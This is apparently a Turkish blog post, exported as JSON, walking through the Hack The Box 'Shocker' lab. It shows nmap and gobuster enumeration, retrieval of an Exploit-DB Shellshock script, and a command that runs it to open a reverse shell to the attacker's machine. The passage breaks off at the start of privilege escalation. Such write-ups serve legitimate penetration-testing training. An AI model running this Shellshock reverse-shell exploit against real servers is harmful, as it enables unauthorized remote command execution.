{"id":1459,"date":"2021-08-02T19:56:07","date_gmt":"2021-08-02T19:56:07","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1459"},"modified":"2021-08-02T19:56:07","modified_gmt":"2021-08-02T19:56:07","slug":"shocker","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/02\/shocker\/","title":{"rendered":"Shocker"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/108\" title=\"Shocker\">Shocker<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/efef52a0fb63d9c8db0ab6e50cb6ac79.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">PORT     STATE SERVICE VERSION\n80\/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n| vulners: \n|   cpe:\/a:apache:http_server:2.4.18: \n|       CVE-2021-26691  7.5 https:\/\/vulners.com\/cve\/CVE-2021-26691\n|       CVE-2017-7679   7.5 https:\/\/vulners.com\/cve\/CVE-2017-7679\n|       CVE-2017-7668   7.5 https:\/\/vulners.com\/cve\/CVE-2017-7668\n|       CVE-2017-3169   7.5 https:\/\/vulners.com\/cve\/CVE-2017-3169\n|       CVE-2017-3167   7.5 https:\/\/vulners.com\/cve\/CVE-2017-3167\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2019-0211\/ 7.2 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2019-0211\/  *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2019-0211\/  7.2 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2019-0211\/   *EXPLOIT*\n|       EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    7.2 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    *EXPLOIT*\n|       CVE-2019-0211   7.2 https:\/\/vulners.com\/cve\/CVE-2019-0211\n|       1337DAY-ID-32502    7.2 https:\/\/vulners.com\/zdt\/1337DAY-ID-32502    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2017-15715\/ *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2017-15715\/ 6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2017-15715\/  *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2017-15715\/ *EXPLOIT*\n|       MSF:ILITIES\/ALPINE-LINUX-CVE-2018-1312\/ 6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ALPINE-LINUX-CVE-2018-1312\/  *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2019-0217\/ 6.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2019-0217\/  *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2019-0217\/  6.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2019-0217\/   *EXPLOIT*\n|       EDB-ID:47689    5.8 https:\/\/vulners.com\/exploitdb\/EDB-ID:47689  *EXPLOIT*\n|       1337DAY-ID-33577    5.8 https:\/\/vulners.com\/zdt\/1337DAY-ID-33577    *EXPLOIT*\n|       SSV:96537   5.0 https:\/\/vulners.com\/seebug\/SSV:96537    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1333\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1333\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1303\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1303\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2017-15710\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2017-15710\/   *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2020-1934\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2020-1934\/    *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2017-15710\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2017-15710\/   *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2017-15710\/ 5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2017-15710\/  *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2016-8743\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2016-8743\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710\/   *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2017-15710\/    5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2017-15710\/ *EXPLOIT*\n|       MSF:AUXILIARY\/SCANNER\/HTTP\/APACHE_OPTIONSBLEED  5.0 https:\/\/vulners.com\/metasploit\/MSF:AUXILIARY\/SCANNER\/HTTP\/APACHE_OPTIONSBLEED   *EXPLOIT*\n|       EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    5.0 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    *EXPLOIT*\n|       EXPLOITPACK:2666FB0676B4B582D689921651A30355    5.0 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:2666FB0676B4B582D689921651A30355    *EXPLOIT*\n|       EDB-ID:40909    5.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:40909  *EXPLOIT*\n|       1337DAY-ID-28573    5.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-28573    *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2019-0197\/   4.9 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2019-0197\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1302\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1302\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1301\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1301\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975\/    *EXPLOIT*\n|       MSF:ILITIES\/DEBIAN-CVE-2019-10092\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/DEBIAN-CVE-2019-10092\/   *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2020-11985\/    4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2020-11985\/ *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2019-10092\/    4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2019-10092\/ *EXPLOIT*\n|       EDB-ID:47688    4.3 https:\/\/vulners.com\/exploitdb\/EDB-ID:47688  *EXPLOIT*\n|       1337DAY-ID-33575    4.3 https:\/\/vulners.com\/zdt\/1337DAY-ID-33575    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1283\/   3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1283\/    *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2018-1283\/ 3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2018-1283\/  *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2018-1283\/   3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2018-1283\/    *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2018-1283\/  3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2018-1283\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283\/   3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283\/    *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2018-1283\/ 3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2018-1283\/  *EXPLOIT*\n|       PACKETSTORM:152441  0.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:152441  *EXPLOIT*\n|       EDB-ID:46676    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:46676  *EXPLOIT*\n|       EDB-ID:42745    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:42745  *EXPLOIT*\n|       1337DAY-ID-663  0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-663  *EXPLOIT*\n|       1337DAY-ID-601  0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-601  *EXPLOIT*\n|       1337DAY-ID-4533 0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-4533 *EXPLOIT*\n|       1337DAY-ID-3109 0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-3109 *EXPLOIT*\n|_      1337DAY-ID-2237 0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-2237 *EXPLOIT*\n2222\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| vulners: \n|   cpe:\/a:openbsd:openssh:7.2p2: \n|       EDB-ID:21018    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:21018  *EXPLOIT*\n|       CVE-2001-0554   10.0    https:\/\/vulners.com\/cve\/CVE-2001-0554\n|       PACKETSTORM:140070  7.8 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:140070  *EXPLOIT*\n|       EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09    7.8 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09    *EXPLOIT*\n|       EDB-ID:40888    7.8 https:\/\/vulners.com\/exploitdb\/EDB-ID:40888  *EXPLOIT*\n|       CVE-2016-8858   7.8 https:\/\/vulners.com\/cve\/CVE-2016-8858\n|       CVE-2016-6515   7.8 https:\/\/vulners.com\/cve\/CVE-2016-6515\n|       1337DAY-ID-26494    7.8 https:\/\/vulners.com\/zdt\/1337DAY-ID-26494    *EXPLOIT*\n|       SSV:92579   7.5 https:\/\/vulners.com\/seebug\/SSV:92579    *EXPLOIT*\n|       CVE-2016-10009  7.5 https:\/\/vulners.com\/cve\/CVE-2016-10009\n|       1337DAY-ID-26576    7.5 https:\/\/vulners.com\/zdt\/1337DAY-ID-26576    *EXPLOIT*\n|       SSV:92582   7.2 https:\/\/vulners.com\/seebug\/SSV:92582    *EXPLOIT*\n|       CVE-2016-10012  7.2 https:\/\/vulners.com\/cve\/CVE-2016-10012\n|       CVE-2015-8325   7.2 https:\/\/vulners.com\/cve\/CVE-2015-8325\n|       SSV:92580   6.9 https:\/\/vulners.com\/seebug\/SSV:92580    *EXPLOIT*\n|       1337DAY-ID-26577    6.9 https:\/\/vulners.com\/zdt\/1337DAY-ID-26577    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2019-25017\/    5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2019-25017\/ *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/REDHAT-OPENSHIFT-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT-OPENSHIFT-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2019-6111\/  5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2019-6111\/   *EXPLOIT*\n|       MSF:ILITIES\/IBM-AIX-CVE-2019-6111\/  5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-AIX-CVE-2019-6111\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/GENTOO-LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/GENTOO-LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/F5-BIG-IP-CVE-2019-6111\/    5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/F5-BIG-IP-CVE-2019-6111\/ *EXPLOIT*\n|       MSF:ILITIES\/DEBIAN-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/DEBIAN-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/AMAZON_LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AMAZON_LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/AMAZON-LINUX-AMI-2-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AMAZON-LINUX-AMI-2-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/ALPINE-LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ALPINE-LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:98FE96309F9524B8C84C508837551A19    *EXPLOIT*\n|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    *EXPLOIT*\n|       EDB-ID:46516    5.8 https:\/\/vulners.com\/exploitdb\/EDB-ID:46516  *EXPLOIT*\n|       SSV:91041   5.5 https:\/\/vulners.com\/seebug\/SSV:91041    *EXPLOIT*\n|       PACKETSTORM:140019  5.5 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:140019  *EXPLOIT*\n|       PACKETSTORM:136234  5.5 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:136234  *EXPLOIT*\n|       EXPLOITPACK:F92411A645D85F05BDBD274FD222226F    5.5 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F    *EXPLOIT*\n|       EXPLOITPACK:9F2E746846C3C623A27A441281EAD138    5.5 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138    *EXPLOIT*\n|       EXPLOITPACK:1902C998CBF9154396911926B4C3B330    5.5 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:1902C998CBF9154396911926B4C3B330    *EXPLOIT*\n|       EDB-ID:40858    5.5 https:\/\/vulners.com\/exploitdb\/EDB-ID:40858  *EXPLOIT*\n|       SSH_ENUM    5.0 https:\/\/vulners.com\/canvas\/SSH_ENUM *EXPLOIT*\n|       PACKETSTORM:150621  5.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:150621  *EXPLOIT*\n|       MSF:AUXILIARY\/SCANNER\/SSH\/SSH_ENUMUSERS 5.0 https:\/\/vulners.com\/metasploit\/MSF:AUXILIARY\/SCANNER\/SSH\/SSH_ENUMUSERS  *EXPLOIT*\n|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    *EXPLOIT*\n|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    *EXPLOIT*\n|       EDB-ID:45939    5.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:45939  *EXPLOIT*\n|       1337DAY-ID-31730    5.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-31730    *EXPLOIT*\n|       EDB-ID:45233    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:45233  *EXPLOIT*\n|       EDB-ID:40963    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:40963  *EXPLOIT*\n|       EDB-ID:40962    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:40962  *EXPLOIT*\n|       MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2020-14145\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2020-14145\/  *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/F5-BIG-IP-CVE-2020-14145\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/F5-BIG-IP-CVE-2020-14145\/    *EXPLOIT*\n|       EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF    4.3 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF    *EXPLOIT*\n|       EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF    4.3 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF    *EXPLOIT*\n|       1337DAY-ID-25440    4.3 https:\/\/vulners.com\/zdt\/1337DAY-ID-25440    *EXPLOIT*\n|       1337DAY-ID-25438    4.3 https:\/\/vulners.com\/zdt\/1337DAY-ID-25438    *EXPLOIT*\n|       SSV:92581   2.1 https:\/\/vulners.com\/seebug\/SSV:92581    *EXPLOIT*\n|       PACKETSTORM:151227  0.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:151227  *EXPLOIT*\n|       PACKETSTORM:140261  0.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:140261  *EXPLOIT*\n|       PACKETSTORM:138006  0.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:138006  *EXPLOIT*\n|       PACKETSTORM:137942  0.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:137942  *EXPLOIT*\n|       EDB-ID:46193    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:46193  *EXPLOIT*\n|       EDB-ID:40136    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:40136  *EXPLOIT*\n|       EDB-ID:40113    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:40113  *EXPLOIT*\n|       EDB-ID:39569    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:39569  *EXPLOIT*\n|       1337DAY-ID-32009    0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-32009    *EXPLOIT*\n|       1337DAY-ID-30937    0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-30937    *EXPLOIT*\n|_      1337DAY-ID-10010    0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-10010    *EXPLOIT*\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/code><\/pre>\n<p>Daha sonras\u0131nda gobuster \u00e7al\u0131\u015ft\u0131rd\u0131m. cgi-bin g\u00f6r\u00fcnce shellshock ihtimaline kar\u015f\u0131 oraya da gobuster yapt\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Shocker]\n\u2514\u2500# gobuster dir --url http:\/\/10.10.10.56\/cgi-bin\/ --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions pl,cgi,py,sh --timeout 20s -t 50 -w \/usr\/share\/wordlists\/dirb\/big.txt --no-error  | tee gobuster12\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.56\/cgi-bin\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              pl,cgi,py,sh\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 20s\n===============================================================\n2021\/08\/02 15:02:25 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.56\/cgi-bin\/.htpasswd\/           (Status: 403) [Size: 304]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htaccess\/           (Status: 403) [Size: 304]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htpasswd.pl         (Status: 403) [Size: 306]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htaccess.sh         (Status: 403) [Size: 306]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htpasswd.cgi        (Status: 403) [Size: 307]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htaccess.pl         (Status: 403) [Size: 306]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htpasswd.py         (Status: 403) [Size: 306]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htpasswd.sh         (Status: 403) [Size: 306]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htaccess.cgi        (Status: 403) [Size: 307]\nhttp:\/\/10.10.10.56\/cgi-bin\/.htaccess.py         (Status: 403) [Size: 306]\nhttp:\/\/10.10.10.56\/cgi-bin\/user.sh              (Status: 200) [Size: 119]\n\n===============================================================\n2021\/08\/02 15:07:03 Finished\n===============================================================<\/code><\/pre>\n<p>Harika! Hadi deneyelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Shocker]\n\u2514\u2500# searchsploit shellshock apache\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nApache mod_cgi - &#039;Shellshock&#039; Remote Command Injection                                                                                                                                                      | linux\/remote\/34900.py\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\nPapers: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Shocker]\n\u2514\u2500# searchsploit -m linux\/remote\/34900.py  \n  Exploit: Apache mod_cgi - &#039;Shellshock&#039; Remote Command Injection\n      URL: https:\/\/www.exploit-db.com\/exploits\/34900\n     Path: \/usr\/share\/exploitdb\/exploits\/linux\/remote\/34900.py\nFile Type: Python script, ASCII text executable, with CRLF line terminators\n\nCopied to: \/root\/oscp\/htb\/Shocker\/34900.py<\/code><\/pre>\n<p>Exploitin i\u00e7erisini <strong>\/cgi-bin\/user.sh<\/strong> olacak \u015fekilde d\u00fczenledim ve reverse ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Shocker]\n\u2514\u2500# python2 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.9 lport=4444\n[!] Started reverse shell handler\n[-] Trying exploit on : \/cgi-bin\/user.sh\n[!] Successfully exploited\n[!] Incoming connection from 10.10.10.56\n10.10.10.56&gt; whoami\nshelly\n<\/code><\/pre>\n<p>Bundan sonras\u0131 son derece kolayd\u0131.<\/p>\n<pre><code class=\"language-sh\">\nshelly@Shocker:\/usr\/lib\/cgi-bin$ sudo -l\nsudo -l\nMatching Defaults entries for shelly on Shocker:\n    env_reset, mail_badpass,\n    